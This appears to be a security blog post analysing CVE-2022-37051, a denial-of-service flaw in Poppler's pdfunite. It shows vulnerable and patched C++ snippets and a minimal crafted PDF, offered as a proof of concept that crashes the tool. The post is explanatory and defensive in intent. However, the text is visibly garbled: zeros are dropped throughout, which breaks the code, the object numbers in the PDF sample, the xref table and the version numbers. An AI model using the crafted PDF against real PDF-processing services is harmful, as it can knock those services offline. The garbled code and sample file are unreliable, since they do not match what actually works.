CVE CyberSecurity Database News

CVE-2022-37051 - Denial of Service in Poppler 22.07. via pdfunite Stream Handling — Analysis & Exploit

Poster -

On July 2022, security researchers discovered a vulnerability in Poppler (version 22.07.), a widely used open-source PDF rendering library. The flaw was assigned CVE-2022-37051 and is notable because it can lead to a denial of service (DoS) simply by processing a crafted PDF file with the pdfunite tool.

This long-read post will break down how the bug occurs, demonstrate its exploitation, and recommend how to mitigate it in your environment.

What is Poppler and pdfunite?

Poppler is a PDF rendering library used in Linux distributions and PDF viewer applications. It includes command-line tools like pdfunite, which can merge multiple PDF files into one.

pdfunite is great for scripts, automation, and bulk PDF operations. Its usage is simple

pdfunite file1.pdf file2.pdf output.pdf

Vulnerability Summary

In Poppler 22.07., there exists a bug in the main function of pdfunite.cc. When handling PDFs with embedded files, pdfunite does not properly check if the internal file stream is valid before attempting to save the embedded file. When it encounters a malformed or crafted PDF, the absence of this check can cause Poppler to reach a fatal error (abort), crashing the process and resulting in Denial of Service.

Let’s look at a simplified version of the problematic area in pdfunite.cc

// pdfunite.cc ~ line 345 in Poppler 22.07.
if (embeddedFile->getLength() > ) {
    // No check for stream validity!
    std::unique_ptr<OutputFile> file = ...;
    embeddedFile->save(file.get(), ...); // <-- Causes abort if stream nullptr
}

What’s missing?

There is no stream validity check for embeddedFile before trying to save() it. If embeddedFile is invalid (for example, due to PDF corruption or a crafted file), the process reaches an unrecoverable abort, stopping execution immediately.

What is Reachable Abort?

A reachable abort means the code reaches a fatal error (like C++'s abort()) through inputs controlled by an attacker, potentially crashing the entire program. In servers or cloud-pipeline tools that run Poppler for others, this means someone could take the service offline by uploading or processing a bad PDF.

How Can This Be Exploited?

Any attacker could craft a PDF file with an embedded file stream that is incorrectly formed or missing. When pdfunite processes this file, Poppler attempts to save the non-existent embedded stream and hits the unreachable abort, killing the process.

Example Exploit PDF

Here’s a conceptual approach (using qpdf or a low-level hex editor) you could use to craft an exploit PDF:

7 obj

<< /Type /EmbeddedFile >>

Example Minimal Malicious PDF (for demonstration only)

%PDF-1.7
1  obj
<< /Type /Catalog /Names << /EmbeddedFiles 2  R >> >>
endobj

2  obj
<< /Names [ (test.bin) 3  R ] >>
endobj

3  obj
<< /Type /Filespec /F (test.bin) /EF << /F 4  R >> >>
endobj

4  obj
<< /Type /EmbeddedFile >> % no stream
endobj

xref
 5
000000000 65535 f
000000001 00000 n
0000000079 00000 n
0000000126 00000 n
0000000193 00000 n
trailer
<< /Root 1  R /Size 5 >>
startxref
246
%%EOF

When merging this PDF with a valid PDF using pdfunite, the process will crash.

Impact

- Denial of Service (DoS): Poppler-based services, PDF merging backends, automation pipelines using pdfunite, or document management systems can crash.

References & Original Reports

- CVE-2022-37051 detail page at NVD
- Poppler bugzilla issue #1253
- Poppler 22.08. release notes, which includes the fix.

How Was it Fixed?

The fix in Poppler 22.08. added a stream validity check before saving embedded files. Here’s a safe pattern:

if (embeddedFile->isOk() && embeddedFile->getLength() > ) {
    // It's now safe to save
    std::unique_ptr<OutputFile> file = ...;
    embeddedFile->save(file.get(), ...);
}

Mitigation & Recommendations

1. Update Poppler: Always use the latest version (22.08. or above) in production.

Summary

CVE-2022-37051 might sound minor, but for systems processing hundreds or thousands of user PDFs daily, it’s a potential attack vector. Just one crafted PDF can kill the tool or service, affecting productivity and availability.

If you operate a PDF processing service, patch now!

Footnote:
This post is exclusive and written in plain language for sysadmins, DevOps, and developers.
For feedback, corrections, or extended PoC requests, reach out in the comments.

Timeline

Published on: 08/22/2023 19:16:00 UTC
Last modified on: 10/16/2023 14:15:00 UTC